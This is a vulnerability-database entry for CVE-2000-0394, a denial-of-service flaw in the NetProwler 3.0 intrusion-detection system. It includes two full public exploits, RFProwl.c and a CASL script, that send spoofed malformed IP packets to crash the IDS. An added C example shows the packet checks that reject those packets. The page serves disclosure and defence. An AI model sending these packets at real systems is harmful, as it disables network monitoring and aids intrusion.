CVE-2000-0394
CVSS 5.0
Published: 2000-05-18 00:00:00
Revised: 2016-10-17 22:06:55
NMCOE

[Original] NetProwler 3.0 allows remote attackers to cause a denial of service by sending malformed IP packets that trigger NetProwler's Man-in-the-Middle signature.


[CNNVD] Axent NetProwler malformed IP packet DoS vulnerability (CNNVD-200005-072)

        NetProwler 3.0 is vulnerable. A remote attacker can cause a denial of service by sending malformed IP packets that trigger NetProwler's Man-in-the-Middle signature.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0394
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0394
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-072
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=95878603510835&w=2
(UNKNOWN)  BUGTRAQ  20000519 RFP2K05: NetProwler vs. RFProwler
http://www.securityfocus.com/bid/1225
(UNKNOWN)  BID  1225
http://www.securityfocus.com/templates/archive.pike?list=1&msg=392AD3B3.3E9BE3EA@axent.com
(UNKNOWN)  BUGTRAQ  20000522 RFP2K05 - NetProwler "Fragmentation" Issue

- Vulnerability info

Axent NetProwler malformed IP packet DoS vulnerability
Medium severity  Other
2000-05-18 00:00:00 2005-05-02 00:00:00
Remote / Local
        NetProwler 3.0 is vulnerable. A remote attacker can cause a denial of service by sending malformed IP packets that trigger NetProwler's Man-in-the-Middle signature.

- Advisory and patch

        Upgrade to NetProwler 3.5 (to be released in June 2000).

- Vulnerability info (19940)

Axent NetProwler 3.0 Malformed IP Packets DoS Vulnerability (1) (EDBID:19940)
windows dos
2000-05-18 Verified
0 rain forest puppy
N/A
source: http://www.securityfocus.com/bid/1225/info

Axent NetProwler 3.0 IDS is vulnerable to a malformed packet attack. It will crash if the Man-in-the-Middle signature encounters a packet for which the following expression is true:
(IP_HEADER_LENGTH + TCP_HEADER_LENGTH) > IP_TOTAL_LENGTH

According to the Axent security team, this is not a fragmented-packet issue as reported in RFP2K05 by Rain Forest Puppy.

In addition, NetProwler uses the Microsoft JET engine 3.5 to store incoming alert information. More information about the Microsoft JET engine 3.5 vulnerability can be found at:

http://www.securityfocus.com/bid/286 

/* 	RFProwl.c - rain forest puppy / wiretrip / rfp@wiretrip.net
	
	Kills NetProwler IDS version 3.0
	
	You need libnet installed.  It's available from
	www.packetfactory.net.  Acks to route.

	Only tested on RH 6.x Linux.  To compile:
	gcc RFProwl.c -lnet -o RFProwl			

	Plus, make sure your architecture is defined below:   */

#define LIBNET_LIL_ENDIAN 1
#undef  LIBNET_BIG_ENDIAN

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <libnet.h>          /* libnet 0.x API: open_raw_sock(), write_ip() */

/* it's just much easier to code in the packet frags we want. :) */

/* pack1: IPv4, IHL 20, total length 36, fragment offset 3 (24 bytes), MF clear,
   protocol TCP, 10.9.101.13 -> 10.9.100.1. The bytes after the IP header look
   like a TCP segment 1026 -> 2058 with data offset 0. 46 bytes are written. */
unsigned char pack1[]="\x45\x00"
"\x00\x24\x08\xb9\x00\x03\x3e\x06\x96\xf8\x0a\x09\x65\x0d\x0a\x09"
"\x64\x01\x04\x02\x08\x0a\x00\x26\xcd\x35\x00\x00\x00\x00\x01\x02"
"\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

/* pack2: IPv4, IHL 20, total length 44, MF set, offset 0, protocol TCP: a SYN
   1032 -> 21 with data offset 10 (40 bytes) and an MSS 1460 option, so
   IP header + TCP header = 60 > 44, the condition Axent described. */
unsigned char pack2[]="\x45\x00"
"\x00\x2c\x08\xbf\x20\x00\x3e\x06\x76\xed\x0a\x09\x65\x0d\x0a\x09"
"\x64\x01\x04\x08\x00\x15\xa7\xe4\x00\x48\x00\x00\x00\x00\xa0\x02"
"\x7d\x78\x72\x9d\x00\x00\x02\x04\x05\xb4\x00\x00";

int main(int argc, char **argv) {
    int sock, c;
    in_addr_t src_ip, dst_ip;   /* 32-bit, network byte order (u_long is 64 bits on LP64) */

    printf("RFProwl - rain forest puppy / wiretrip\n");

    if(argc<3){
      printf("Usage: RFProwl <profiled IP/destination> <src IP(fake)>\n");
      exit(EXIT_FAILURE);}

    dst_ip=inet_addr(argv[1]);
    src_ip=inet_addr(argv[2]);
    if(dst_ip==INADDR_NONE || src_ip==INADDR_NONE){
      printf("Bad IP address\n");
      exit(EXIT_FAILURE);}

    /* Patch the source (offset 12) and destination (offset 16) into both IP
       headers. The hard-coded IP checksums then no longer match, but Linux
       raw sockets with IP_HDRINCL rewrite the IP checksum on send. */
    memcpy(pack1+16,&dst_ip,4);
    memcpy(pack2+16,&dst_ip,4);
    memcpy(pack1+12,&src_ip,4);
    memcpy(pack2+12,&src_ip,4);

    sock = open_raw_sock(IPPROTO_RAW);
    if (sock == -1){
      perror("Socket problems: ");
      exit(EXIT_FAILURE);}
    
    c = write_ip(sock, pack1, 46);
    if (c < 46) printf("Write_ip #1 choked\n");

    c = write_ip(sock, pack2, 46);
    if (c < 46) printf("Write_ip #2 choked\n");
  
    printf("Packets sent\n");

    return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);}
		
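The crash condition quoted above, (IP_HEADER_LENGTH + TCP_HEADER_LENGTH) > IP_TOTAL_LENGTH, is easy to evaluate against the two packets RFProwl.c sends, and it is the kind of inconsistency a packet decoder has to reject before it dereferences any TCP field. The following is an added example, not code from the advisory, from RFProwl.c or from Axent: it copies the two RFProwl packets byte for byte, adds a constructed well-formed SYN for contrast, evaluates the advisory's expression naively the way a careless decoder would, and then shows an ordered set of bounds checks that refuses such packets. The function and enum names, and the well-formed SYN (checksums left zero), are the example's own; it does not claim to reproduce NetProwler's parser.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define PKT_LEN(a) (sizeof (a) - 1)   /* drop the string literal's trailing NUL */

/* The two packets from RFProwl.c, byte for byte (10.9.101.13 -> 10.9.100.1). */
const uint8_t rfp_pack1[] = "\x45\x00"
"\x00\x24\x08\xb9\x00\x03\x3e\x06\x96\xf8\x0a\x09\x65\x0d\x0a\x09"
"\x64\x01\x04\x02\x08\x0a\x00\x26\xcd\x35\x00\x00\x00\x00\x01\x02"
"\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

const uint8_t rfp_pack2[] = "\x45\x00"
"\x00\x2c\x08\xbf\x20\x00\x3e\x06\x76\xed\x0a\x09\x65\x0d\x0a\x09"
"\x64\x01\x04\x08\x00\x15\xa7\xe4\x00\x48\x00\x00\x00\x00\xa0\x02"
"\x7d\x78\x72\x9d\x00\x00\x02\x04\x05\xb4\x00\x00";

/* Constructed for contrast (not from the page): a well-formed 40-byte SYN,
 * 192.168.0.1:1234 -> 192.168.0.2:80, checksums left zero (not verified here). */
const uint8_t good_syn[] =
"\x45\x00\x00\x28\x00\x01\x00\x00\x40\x06\x00\x00\xc0\xa8\x00\x01\xc0\xa8\x00\x02"
"\x04\xd2\x00\x50\x00\x00\x00\x01\x00\x00\x00\x00\x50\x02\x20\x00\x00\x00\x00\x00";

enum pkt_verdict {
    PKT_OK = 0,
    PKT_TRUNCATED,    /* < 20 bytes, not IPv4, or ip_len larger than the bytes captured */
    PKT_BAD_IHL,      /* IHL < 20 or IHL > ip_len */
    PKT_NOT_TCP,
    PKT_FRAGMENT,     /* non-first fragment: the bytes at IHL are payload, not a TCP header */
    PKT_BAD_DOFF,     /* TCP data offset < 20 bytes */
    PKT_TCP_OVERRUN   /* IHL + data offset > ip_len: the advisory's crash condition */
};

/* Naive evaluation of the advisory's expression: read the TCP data offset
 * wherever IHL says the transport header starts, with no fragment or bounds
 * checks. Returns 1 if the condition holds, 0 if not, -1 if unreadable. */
int advisory_condition(const uint8_t *p, size_t len)
{
    unsigned ihl = (p[0] & 0x0f) * 4u;
    unsigned ip_len = ((unsigned)p[2] << 8) | p[3];
    unsigned doff;
    if (len < ihl + 13u) return -1;         /* cannot even reach the offset byte */
    doff = (p[ihl + 12] >> 4) * 4u;
    return ihl + doff > ip_len;
}

/* Safe order of checks: every length is validated against the bytes actually
 * present and against the enclosing length before the next field is read. */
enum pkt_verdict check_ipv4_tcp(const uint8_t *p, size_t len)
{
    unsigned ihl, ip_len, frag_off, doff;
    if (len < 20 || (p[0] >> 4) != 4) return PKT_TRUNCATED;
    ihl      = (p[0] & 0x0f) * 4u;
    ip_len   = ((unsigned)p[2] << 8) | p[3];
    frag_off = (((unsigned)p[6] & 0x1f) << 8) | p[7];    /* 8-byte units */
    if (ihl < 20 || ihl > ip_len) return PKT_BAD_IHL;
    if (ip_len > len) return PKT_TRUNCATED;
    if (p[9] != 6) return PKT_NOT_TCP;
    if (frag_off != 0) return PKT_FRAGMENT;             /* only offset 0 carries the TCP header */
    if (ip_len - ihl < 20) return PKT_TCP_OVERRUN;      /* not even a fixed TCP header fits */
    doff = (p[ihl + 12] >> 4) * 4u;
    if (doff < 20) return PKT_BAD_DOFF;                 /* RFC 793: data offset >= 5 words */
    if (ihl + doff > ip_len) return PKT_TCP_OVERRUN;    /* the NetProwler condition */
    return PKT_OK;
}

int main(void)
{
    const char *names[] = { "RFProwl pack1", "RFProwl pack2", "well-formed SYN" };
    const uint8_t *pk[] = { rfp_pack1, rfp_pack2, good_syn };
    size_t ln[] = { PKT_LEN(rfp_pack1), PKT_LEN(rfp_pack2), PKT_LEN(good_syn) };
    for (int i = 0; i < 3; i++)
        printf("%-16s advisory condition=%d  verdict=%d\n", names[i],
               advisory_condition(pk[i], ln[i]), (int)check_ipv4_tcp(pk[i], ln[i]));
    return 0;
}
```

Run as is, it reports that pack2 (IHL 20 + data offset 40 = 60 against a total length of 44) satisfies the advisory's expression while pack1 (data offset 0) does not; the ordered checks reject pack1 as a non-first fragment before its bogus TCP header is ever read, reject pack2 as an overrun, and pass the well-formed SYN. The point for anyone writing a decoder is the ordering: validate IHL against ip_len and ip_len against the captured length, refuse to parse a transport header on a non-zero fragment offset, and only then read and bound the TCP data offset.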

- Vulnerability info (19941)

Axent NetProwler 3.0 Malformed IP Packets DoS Vulnerability (2) (EDBID:19941)
windows dos
2000-05-18 Verified
0 Pedro Quintanilha
N/A
source: http://www.securityfocus.com/bid/1225/info

#include "tcpip.casl"
#include "packets.casl"

Src = pop args;
Dst = pop args;


Src = getip(Src);
Dst = getip(Dst);


iph = copy TCPIP;
iph.ip_version = 4;
iph.ip_headerlen = 5;
iph.ip_tos = 0;
iph.ip_length = 36;
iph.ip_id  = 2233;
iph.ip_offset = 3;
iph.ip_ttl = 62;
iph.ip_protocol = 6;
iph.ip_cksum = 38648;
iph.ip_source = Src;
iph.ip_destination = Dst;

tch = copy SYN;
tch.tcp_source = 1026;
tch.tcp_destination = 2058;
tch.tcp_seqno = 2542901;
tch.tcp_ackno = 0;
tch.tcp_offset = 0;
tch.tcp_x2 = 1;
tch.tcp_syn = 1;
tch.tcp_window = 768;

pk1data = "\x00\x00\x00\x00\x00\x00";


packet = [ iph, tch, pk1data ];

ip_output(packet);

iph2 = copy TCPIP;
iph2.ip_version = 4;
iph2.ip_headerlen = 5;
iph2.ip_tos = 0;
iph2.ip_length = 44;
iph2.ip_id = 2239;
iph2.ip_mf = 1;
iph2.ip_ttl = 62;
iph2.ip_protocol = 6;
iph2.ip_cksum = 30445;
iph2.ip_source = Src;
iph2.ip_destination = Dst;

tch2 = copy SYN;
tch2.tcp_source = 1032;
tch2.tcp_destination = 21;
tch2.tcp_seqno = 2816737352;
tch2.tcp_ackno = 0;
tch2.tcp_x2 = 10;
tch2.tcp_syn = 1;
tch2.tcp_window = 32120;
tch2.tcp_cksum = 29341;

pk2data = "\x02\x04\x05\xb4\x00\x00";

packet = [ iph2, tch2, pk2data ];

ip_output(packet);

- Vulnerability info

1343
Axent NetProwler Malformed IP Packet DoS
Remote / Network Access  Denial of Service
Loss of Availability
Exploit Public  Third-party Verified

- Vulnerability description

Unknown or Incomplete

- Timeline

2000-05-19 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete